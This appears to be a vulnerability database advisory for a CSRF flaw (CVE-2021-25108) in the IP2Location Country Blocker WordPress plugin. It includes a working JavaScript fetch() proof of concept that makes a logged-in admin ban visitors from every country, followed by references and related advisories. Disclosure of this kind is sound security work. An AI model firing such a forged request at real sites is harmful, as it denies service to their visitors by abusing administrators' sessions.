IP2Location Country Blocker < 2.26.6 – Arbitrary Country Ban via CSRF | CVE 2021-25108 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend.

Proof of Concept

Make an admin open a page with the following code in it, which will ban visitors from all countries:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(function(data) { console.log(data); });

Affects Plugins

ip2location-country-blocker

Fixed in 2.26.6

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2653459

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

9d416ca3-bd02-4fcf-b3b8-f2f2280d02d2

Timeline

Publicly Published

2022-01-06 (about 3 years ago)

Added

2022-01-06 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2023-10-16

Title

MailChimp Forms by MailMunch < 3.1.5 - Arbitrary Actions via CSRF

Published

2024-11-13

Title

SK WP Settings Backup <= 1.0 - Cross-Site Request Forgery to PHP Object Injection

Published

2014-08-01

Title

Stream Video Player <= 1.4.0 - Setting Manipulation CSRF

Published

2025-03-27

Title

Store Locator Widget < 2025r3r2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-06-20

Title

Education Zone < 1.3.5 - Cross-Site Request Forgery to Notice Dismissal